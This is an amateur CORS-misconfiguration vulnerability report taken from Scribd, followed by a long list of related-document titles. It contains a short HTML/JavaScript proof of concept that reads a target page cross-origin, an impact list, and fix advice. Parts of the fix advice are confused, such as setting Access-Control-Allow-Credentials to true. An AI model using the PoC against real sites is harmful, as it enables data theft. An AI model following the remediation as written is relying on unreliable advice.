CORS Misconfiguration Vulnerability Report

Uploaded by

goldenhatx14

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as DOCX, PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

27 views5 pages

CORS Misconfiguration Vulnerability Report

Uploaded by

goldenhatx14

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as DOCX, PDF, TXT or read online on Scribd

Vulnerability Report

Type of the vulnerability: CORS Misconfiguration

Founded by: GoldenHat

Time&Date of scan: 31/3/2024 10:15PM

Introduction
Decription:
CORS (Cross-Origin Resource Sharing): is a mechanism used in
web browsers that allows controlled access to resourses located
outside the given domin . CORS extends and enhance the Same-
Origin Policy (SOP), but it can also be vulnerable to cross-domain
attacks if the CORS Policy for a specfic website is misconfigured or
not properly enforced. It’s important to note that CORS is not
protection against croos-site attacks like Cross-Site Request
Forgery (CSRF).
The CORS Misconfiguration Vulnerability occurs when The CORS
Policy is incorrectly configured, allowing unauthorized domians
to access resources. This can lead to security issues such as data
theft or injection, as well as other unexpected behaviors.

What is the risk level of this Vulnerability: Medium .

and can increase to high

Which WEB-page We found this Vulnerability:

We found this Vulnerability in: [Link]
How We found this Vulnerability:
*In the Header in the response Of the webpage

We Found Access-Cntrole-Allow-Origin: *
Exploit:
<!DOCTYPE html>
<html>
<body>
<h2>This script is made by GoldenHat for test A bug</h2>
<div id="demo">
<button type="button" onclick="cors()">Exploit</button>>
</div>
<script>
function cors() {
var xhttps = new XMLHttpRequest();
[Link] = function(){
if ([Link] == 4 && [Link] == 200){

[Link]("demo").innerHTML=alert([Link]);

}
};

[Link]("GET","[Link] true);

[Link]();
}
</script>
</body>
</html>
*first We made a simple Web-page to access the resources Of the
infected web-page,, is contain the URL of infected WEB-Page

*This is site that we made

*Then We click In the exploit button.

>> as we can see the alert contine a webpage source . and now we
confirme the site is infected with CORS-Misconfiguration
Vulnerability.

What we can Do by this vulnerability (the impact):

1. Data theft :
‘since the web-page dsplays the best deals for purchasing
products from other sites’ the attacker can use this
vunerability For theft API Keys , SSh keys,
And access keys to other sites .
2. CSRF :
The Attacker can also do CSRF(Cross-site Request Forgery)
attacks or injection attacks . this could lead to site disruption or
leakage of sensitive information.
3. Other :
The attacker can also do XSS attacks .

How we can close this vulnerability

 Proper CORS Configuration:
. Ensure that your application’s CORS policy is configured
correctly,
Specify The allowed origins using Access-Allow-Origin
header .

. Set The value of this header to the specfic domain(s)

that should be allowed to access your resource. For
example

Access-Control-Allow-Origin: [Link]

. Avoid using wildcard ( * ) .

 Credentials and Headers

. set this

Access-Control-Allow-credentials: true

. Specify the allowed headers using this. And include any

custom headers your application uses

Access-Control-Allow-Headers:
Conclusion

We found CORS Misconfiguration Vulnerability in a web-page this

Vulnerability its a dangrous. Due to the risks is causes (see above in the
impact) . by allowing unauthorized domains to access resourses

Date&Time Of Writting this report:2/4/2024 1:00 AM

Abusing CORS (Improper Origin Validation)
No ratings yet
Abusing CORS (Improper Origin Validation)
12 pages
CORS
No ratings yet
CORS
15 pages
CORS Vulnerability and CSRF Token Guide
No ratings yet
CORS Vulnerability and CSRF Token Guide
4 pages
CORS Misconfiguration Vulnerabilities
No ratings yet
CORS Misconfiguration Vulnerabilities
14 pages
Understanding CORS Vulnerabilities
No ratings yet
Understanding CORS Vulnerabilities
16 pages
CORS Explained: Security and Implementation
No ratings yet
CORS Explained: Security and Implementation
6 pages
Understanding CORS Vulnerabilities
No ratings yet
Understanding CORS Vulnerabilities
38 pages
CORS Misconfiguration Exploitation Guide
No ratings yet
CORS Misconfiguration Exploitation Guide
10 pages
Insecure CORS Configuration Risks
No ratings yet
Insecure CORS Configuration Risks
3 pages
Exploiting CORS Misconfigurations
No ratings yet
Exploiting CORS Misconfigurations
4 pages
API Server Security Best Practices
No ratings yet
API Server Security Best Practices
16 pages
Understanding CORS and HSTS Security
No ratings yet
Understanding CORS and HSTS Security
11 pages
Skyscanner Audit Report: Vulnerability Findings
No ratings yet
Skyscanner Audit Report: Vulnerability Findings
9 pages
CORS Misconfiguration Security Report
No ratings yet
CORS Misconfiguration Security Report
4 pages
Understanding Cross-Origin Resource Sharing
No ratings yet
Understanding Cross-Origin Resource Sharing
4 pages
2025 11 25 WPRO 410 ZAP Report Staging
No ratings yet
2025 11 25 WPRO 410 ZAP Report Staging
24 pages
2024-05-23-16-27-00-ZAP-Report-hom-mar.iplanfor.fortaleza.ce.gov.br
No ratings yet
2024-05-23-16-27-00-ZAP-Report-hom-mar.iplanfor.fortaleza.ce.gov.br
151 pages
Secure CORS Configuration Best Practices
No ratings yet
Secure CORS Configuration Best Practices
5 pages
Fixing CORS Errors in Web Development
No ratings yet
Fixing CORS Errors in Web Development
8 pages
Understanding CORS Security Features
No ratings yet
Understanding CORS Security Features
7 pages
Burp Scanner Vulnerability Report
No ratings yet
Burp Scanner Vulnerability Report
3 pages
Quickscan Web Zero Tg75bn
100% (1)
Quickscan Web Zero Tg75bn
34 pages
Understanding IDOR Vulnerabilities
100% (2)
Understanding IDOR Vulnerabilities
8 pages
2025 12 04 Report
No ratings yet
2025 12 04 Report
27 pages
Express Middleware Are Functions That Process HTTP Requests
No ratings yet
Express Middleware Are Functions That Process HTTP Requests
7 pages
XSS, CSS Injection, and CORS Vulnerabilities
No ratings yet
XSS, CSS Injection, and CORS Vulnerabilities
3 pages
CheckRelianceAPI_POS WP-255 ZAP Report 27-Feb-2026 (Staging)2
No ratings yet
CheckRelianceAPI_POS WP-255 ZAP Report 27-Feb-2026 (Staging)2
20 pages
Understanding Same Origin Policy and CORS
No ratings yet
Understanding Same Origin Policy and CORS
18 pages
CORS Vulnerability Exploit Lab Guide
No ratings yet
CORS Vulnerability Exploit Lab Guide
6 pages
Understanding Cross-Origin Resource Sharing
No ratings yet
Understanding Cross-Origin Resource Sharing
3 pages
Web Application Security Report 2025
No ratings yet
Web Application Security Report 2025
22 pages
Understanding Cross-Origin Resource Sharing
No ratings yet
Understanding Cross-Origin Resource Sharing
12 pages
What Is Cross Origin Resource Sharing
No ratings yet
What Is Cross Origin Resource Sharing
6 pages
VAPT Report: Limo Booking Software Security
No ratings yet
VAPT Report: Limo Booking Software Security
4 pages
2024-05-23-16-47-00-ZAP-Report-hom-mar.iplanfor.fortaleza.ce.gov.br
No ratings yet
2024-05-23-16-47-00-ZAP-Report-hom-mar.iplanfor.fortaleza.ce.gov.br
100 pages
CORS Vulnerabilities and Exploits Guide
No ratings yet
CORS Vulnerabilities and Exploits Guide
1 page
2025 11 05 ZAP Report (Staging)
No ratings yet
2025 11 05 ZAP Report (Staging)
6 pages
ZAP Security Scan Report for Prathamik
No ratings yet
ZAP Security Scan Report for Prathamik
169 pages
Origin Injection Attack Prevention Guide
No ratings yet
Origin Injection Attack Prevention Guide
2 pages
Overview of Web Vulnerabilities
0% (1)
Overview of Web Vulnerabilities
4 pages
Understanding IDOR Vulnerabilities
No ratings yet
Understanding IDOR Vulnerabilities
7 pages
Insecure CORS Configuration Risks
No ratings yet
Insecure CORS Configuration Risks
4 pages
Website Vulnerability Scanner Report
No ratings yet
Website Vulnerability Scanner Report
7 pages
WordPress Security Vulnerability Report
No ratings yet
WordPress Security Vulnerability Report
3 pages
OWASP Top 10 Vulnerabilities Report
100% (1)
OWASP Top 10 Vulnerabilities Report
5 pages
CORS Security Guide: Attacks & Defenses
No ratings yet
CORS Security Guide: Attacks & Defenses
26 pages
ChatAPI ZAP Report 1-Jan-2026 (Dev)
No ratings yet
ChatAPI ZAP Report 1-Jan-2026 (Dev)
21 pages
Protecting APIs from Cyber Attacks
No ratings yet
Protecting APIs from Cyber Attacks
10 pages
Understanding Web Security and CORS
No ratings yet
Understanding Web Security and CORS
6 pages
Understanding Cross-Origin Resource Sharing
No ratings yet
Understanding Cross-Origin Resource Sharing
12 pages
Website Security Scan Findings Report
No ratings yet
Website Security Scan Findings Report
7 pages
Flash Cross-Domain Policy Vulnerabilities
No ratings yet
Flash Cross-Domain Policy Vulnerabilities
25 pages
Understanding IDOR Vulnerabilities
No ratings yet
Understanding IDOR Vulnerabilities
9 pages
Mastering CORS in Django and React
No ratings yet
Mastering CORS in Django and React
9 pages
Website Vulnerability Scan Summary
No ratings yet
Website Vulnerability Scan Summary
5 pages
Vulnerability Analysis in Digital Forensics
No ratings yet
Vulnerability Analysis in Digital Forensics
13 pages
CORS Implementation in C# Web Apps
No ratings yet
CORS Implementation in C# Web Apps
5 pages
Understanding Broken Access Control
No ratings yet
Understanding Broken Access Control
20 pages
Understanding the Multisensory Approach
No ratings yet
Understanding the Multisensory Approach
11 pages
Paired Samples Test Results Summary
No ratings yet
Paired Samples Test Results Summary
2 pages
Reading Skills Assessment Results
No ratings yet
Reading Skills Assessment Results
8 pages
Consonants and Short Vowels Lesson Plan
No ratings yet
Consonants and Short Vowels Lesson Plan
7 pages
Teaching Consonants f & v Sounds
No ratings yet
Teaching Consonants f & v Sounds
8 pages
Dyslexia Research and Teaching Strategies
No ratings yet
Dyslexia Research and Teaching Strategies
1 page
Understanding Dyslexia: Causes and Characteristics
No ratings yet
Understanding Dyslexia: Causes and Characteristics
12 pages
Understanding Reading and Dyslexia
No ratings yet
Understanding Reading and Dyslexia
56 pages
Understanding Reading and Dyslexia
No ratings yet
Understanding Reading and Dyslexia
57 pages
DSOMM Application Enhancement Proposal
No ratings yet
DSOMM Application Enhancement Proposal
3 pages
Multisensory Approach for Dyslexia
No ratings yet
Multisensory Approach for Dyslexia
24 pages
Multisensory Approach for Dyslexia Research
No ratings yet
Multisensory Approach for Dyslexia Research
20 pages
Multisensory Approach for Dyslexia Success
No ratings yet
Multisensory Approach for Dyslexia Success
19 pages
Apple's Supply Chain Efficiency Analysis
No ratings yet
Apple's Supply Chain Efficiency Analysis
23 pages
C Programming Lab Overview
No ratings yet
C Programming Lab Overview
119 pages
RB5009UPr+S+IN Router Overview
No ratings yet
RB5009UPr+S+IN Router Overview
4 pages
SumoBot STM32 Hardware & Sensor Setup
No ratings yet
SumoBot STM32 Hardware & Sensor Setup
4 pages
Revolutionizing Influencer Economics in Web3
No ratings yet
Revolutionizing Influencer Economics in Web3
15 pages
3D Delaunay Tessellation Comparison
No ratings yet
3D Delaunay Tessellation Comparison
20 pages
Understanding the Brand Value Chain
No ratings yet
Understanding the Brand Value Chain
11 pages
DC Series Generator Experiment Guide
No ratings yet
DC Series Generator Experiment Guide
8 pages
Financial Accounting For A Trading Business
No ratings yet
Financial Accounting For A Trading Business
25 pages
Legal Recognition of Paternity Request
No ratings yet
Legal Recognition of Paternity Request
8 pages
MAN B&W Engine Control Systems Guide
0% (1)
MAN B&W Engine Control Systems Guide
1 page
4th Semester Electrical Engineering Syllabus
No ratings yet
4th Semester Electrical Engineering Syllabus
38 pages
Agriculture Bioinformatics Alumni Placements
No ratings yet
Agriculture Bioinformatics Alumni Placements
1 page
Invitation to Make it in the Emirates 2025
No ratings yet
Invitation to Make it in the Emirates 2025
1 page
Journal of Endodontics
No ratings yet
Journal of Endodontics
6 pages
Wipro Limited Financial Analysis Report
No ratings yet
Wipro Limited Financial Analysis Report
22 pages
Affidavit of Discrepancy for Birthdate
No ratings yet
Affidavit of Discrepancy for Birthdate
1 page
Newnan Utilities in B2B Markets
No ratings yet
Newnan Utilities in B2B Markets
15 pages
AlexNet: ImageNet Classification 2012
No ratings yet
AlexNet: ImageNet Classification 2012
1 page
Science of Grain Intercropping Benefits
No ratings yet
Science of Grain Intercropping Benefits
68 pages
SSC CGL 2015 Application Details
No ratings yet
SSC CGL 2015 Application Details
5 pages
Aggregate Advertising Response Models
No ratings yet
Aggregate Advertising Response Models
62 pages
Quarterly Assessment on Culture and Politics
No ratings yet
Quarterly Assessment on Culture and Politics
3 pages
DA0ZRLMB6D0 Rev D Schematic Overview
No ratings yet
DA0ZRLMB6D0 Rev D Schematic Overview
34 pages
Power BI Pyramid: Data to Design Guide
No ratings yet
Power BI Pyramid: Data to Design Guide
6 pages
Interlocking Concrete Block Pavements
No ratings yet
Interlocking Concrete Block Pavements
24 pages
Comelit 1449 Touch Screen Panel Specs
No ratings yet
Comelit 1449 Touch Screen Panel Specs
2 pages
220704-VESSEL微宿手册 - 双语水印
No ratings yet
220704-VESSEL微宿手册 - 双语水印
32 pages
Modern British Women Playwrights Guide
No ratings yet
Modern British Women Playwrights Guide
2 pages